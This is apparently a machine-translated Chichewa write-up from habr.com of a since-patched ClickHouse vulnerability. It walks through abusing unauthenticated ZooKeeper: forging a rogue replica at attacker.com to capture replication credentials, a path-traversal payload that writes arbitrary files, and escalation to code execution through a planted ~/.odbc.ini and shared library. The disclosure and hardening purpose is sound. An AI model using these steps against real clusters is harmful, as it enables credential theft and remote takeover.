Nkhaniyi ifotokoza za chiopsezo chodziwika bwino cha ClickHouse replication protocol, ndikuwonetsanso momwe malo owukirawo angakulitsire.
ClickHouse ndi nkhokwe yosungiramo zidziwitso zambiri, nthawi zambiri pogwiritsa ntchito zofananira zingapo. Kuphatikiza ndi kubwereza mu ClickHouse kumamangidwa pamwamba (ZK) ndipo amafuna ufulu wolemba.
Kuyika kwa ZK kosasintha sikufuna kutsimikizika, kotero masauzande a ZK omwe amagwiritsidwa ntchito kukonza Kafka, Hadoop, ClickHouse amapezeka poyera.
Kuti muchepetse malo anu owukira, muyenera kukonza zotsimikizika ndi chilolezo mukakhazikitsa ZooKeeper
Pali za 0day zochokera ku Java deserializations, koma taganizirani kuti wowukirayo amatha kuwerenga ndikulembera ZooKeeper, yomwe imagwiritsidwa ntchito pobwerezabwereza ClickHouse.
Mukakonzedwa mumagulu amagulu, ClickHouse imathandizira mafunso omwe amagawidwa , kudutsa ZK - kwa iwo node amapangidwa mu pepala /clickhouse/task_queue/ddl.
Mwachitsanzo, mumapanga mfundo /clickhouse/task_queue/ddl/query-0001 ndi zomwe zili:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']ndipo pambuyo pake, tebulo loyesa lidzachotsedwa pa ma seva a cluster host1 ndi host2. DDL imathandiziranso kuyendetsa mafunso a CREATE/ALTER/DROP.
Kumveka kowopsa? Koma wowukira angapeze kuti ma adilesi a seva?
imagwira ntchito pamlingo wa matebulo amodzi, kotero kuti tebulo likapangidwa mu ZK, seva imatchulidwa kuti idzakhala ndi udindo wosinthana metadata ndi replicas. Mwachitsanzo, pochita pempho (ZK iyenera kukhazikitsidwa, chXX - dzina la replica, foobar - dzina la tebulo):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;nodes zidzapangidwa mizati ΠΈ metadata.
Zokhutira /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpKodi ndizotheka kuphatikiza data yagululi? Inde, ngati doko lobwereza (TCP/9009) pa seva chXX-address firewall sidzatsekedwa ndipo kutsimikizika kwa kubwereza sikudzakhazikitsidwa. Momwe mungalambalale kutsimikizika?
Wowukira atha kupanga chofananira chatsopano mu ZK pongotengera zomwe zilimo /clickhouse/tables/01-01/foobar/replicas/chXX ndi kusintha tanthauzo host.
Zokhutira /clickhouse/tables/01β01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpKenako muyenera kuuza ena ofananirako kuti pali chipika chatsopano pa seva ya owukira chomwe akuyenera kutenga - node imapangidwa mu ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX XX monotonically kukula counter, yomwe iyenera kukhala yayikulu kuposa yomaliza pa chipika cha zochitika):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2kumene source_replica - dzina lachifaniziro cha wowukirayo chomwe chidapangidwa mu gawo lapitalo, block_id - chizindikiritso cha block block, kupeza - "get block" lamulo (ndi ).
Kenako, choyimira chilichonse chimawerenga chochitika chatsopano mu chipikacho ndikupita ku seva yoyendetsedwa ndi wowukirayo kuti alandire chipika cha data (protocol yobwereza ndi ya binary, ikuyenda pamwamba pa HTTP). Seva attacker.com adzalandira zopempha:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXpomwe XXX ndi data yotsimikizika yobwereza. Nthawi zina, iyi ikhoza kukhala akaunti yokhala ndi database kudzera pa protocol yayikulu ya ClickHouse ndi protocol ya HTTP. Monga momwe mwawonera, malo owukirawo amakhala akulu kwambiri chifukwa ZooKeeper, yomwe imagwiritsidwa ntchito kubwereza, idasiyidwa popanda kutsimikizika kokhazikitsidwa.
Tiyeni tiwone ntchito yopezera chipika cha data kuchokera ku choyimira, chalembedwa ndi chidaliro chonse kuti zofananira zonse zili pansi paulamuliro woyenera ndipo pali chikhulupiriro pakati pawo.
replication processing code
Ntchitoyi imawerenga mndandanda wa mafayilo, ndiye mayina awo, kukula kwake, zomwe zili mkati mwake, kenako ndikuzilemba ku fayilo. Ndikoyenera kufotokoza mosiyana momwe deta imasungidwira mu fayilo.
Pali ma subdirectories angapo mu /var/lib/clickhouse (chikwatu chosungira kuchokera pafayilo yosinthira):
mbendera - chikwatu chojambulira , ntchito kuchira pambuyo imfa deta;
tmp - chikwatu chosungira mafayilo osakhalitsa;
user_files - magwiridwe antchito omwe ali ndi mafayilo pazopempha amangokhala pamndandanda uwu (INTO OUTFILE ndi ena);
metadata - mafayilo a sql okhala ndi mafotokozedwe a tebulo;
preprocessed_configs - mafayilo osinthidwa opangidwa kuchokera /etc/clickhouse-server;
deta - chikwatu chenicheni chomwe chili ndi deta yokha, pakadali pano pa database iliyonse gawo laling'ono limangopangidwa apa (mwachitsanzo /var/lib/clickhouse/data/default).
Pa tebulo lililonse, subdirectory imapangidwa muzolemba za database. Chigawo chilichonse ndi fayilo yosiyana malinga ndi . Mwachitsanzo kwa tebulo foobaropangidwa ndi wowukira, mafayilo otsatirawa adzapangidwa:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2Chofananacho chikuyembekeza kulandira mafayilo omwe ali ndi mayina omwewo pokonza chipika cha data ndipo sichiwatsimikizira mwanjira iliyonse.
Wowerenga mwachidwi mwina adamva kale za kulumikizidwa kosatetezeka kwa file_name mu ntchito WriteBufferFromFile. Inde, izi zimalola wowukira kuti alembe zomwe zili mufayilo iliyonse pa FS yokhala ndi ufulu wogwiritsa ntchito clickhouse. Kuti achite izi, chofanizira chomwe chimayang'aniridwa ndi wowukirayo chiyenera kubweza yankho lotsatirali ku pempho (kudumpha kwa mizere kwawonjezeredwa kuti mumvetsetse):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeperndipo pambuyo pa kutsutsana ../../../../../../../../../tmp/pwned fayilo idzalembedwa /tmp/pwned ndi zomwe zili hellofromzookeeper.
Pali zosankha zingapo zosinthira kuthekera kolemba mafayilo kukhala ma code execution akutali (RCE).
Madikishonale akunja mu RCE
M'matembenuzidwe akale, chikwatu chokhala ndi zoikamo za ClickHouse chidasungidwa ndi ufulu wa ogwiritsa ntchito clickhouse kusakhulupirika. Mafayilo azikhazikiko ndi mafayilo a XML omwe ntchitoyo imawerenga poyambira kenako ndikusunga /var/lib/clickhouse/preprocessed_configs. Zosintha zikachitika, zimawerengedwanso. Ngati muli ndi mwayi /etc/clickhouse-server wowukira akhoza kupanga ake mtundu woyeserera kenako ndikukhazikitsa code yokhazikika. Zomasulira zamakono za ClickHouse sizimapereka ufulu mwachisawawa, koma ngati seva idasinthidwa pang'onopang'ono, ufulu wotere ukhoza kukhalabe. Ngati mukuthandizira gulu la ClickHouse, yang'anani maufulu pazosintha, ziyenera kukhala za wogwiritsa ntchito root.
ODBC kupita ku RCE
Mukayika phukusi, wogwiritsa ntchito amapangidwa clickhouse, koma chikwatu chake chakunyumba sichinapangidwe /nonexistent. Komabe, akamagwiritsa ntchito madikishonale akunja, kapena pazifukwa zina, oyang'anira amapanga chikwatu /nonexistent ndi kupereka wosuta clickhouse mwayi wolembera (SSZB! pafupifupi. womasulira).
ClickHouse imathandizira ndipo imatha kulumikizana ndi nkhokwe zina. Mu ODBC, mutha kufotokoza njira yopita ku library library (.so). Mitundu yakale ya ClickHouse idakulolani kuti muchite izi mwachindunji muzopempha, koma tsopano cheke chokhazikika cha chingwe cholumikizira chawonjezedwa. odbc-bridge, kotero sizingatheke kufotokoza njira yoyendetsa kuchokera ku pempho. Koma kodi wowukirayo angalembere chikwatu chakunyumba pogwiritsa ntchito vuto lomwe tafotokozali?
Tiyeni tipange fayilo ~/.odbc.ini ndi zinthu monga izi:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.sokenako poyambira SELECT * FROM odbc('DSN=lalala', 'test', 'test'); laibulale idzatsegulidwa test.so ndipo adalandira RCE (zikomo kwa nsonga).
Izi ndi zovuta zina zakhazikitsidwa mu ClickHouse version 19.14.3. Samalirani ClickHouse yanu ndi ZooKeepers!
Source: www.habr.com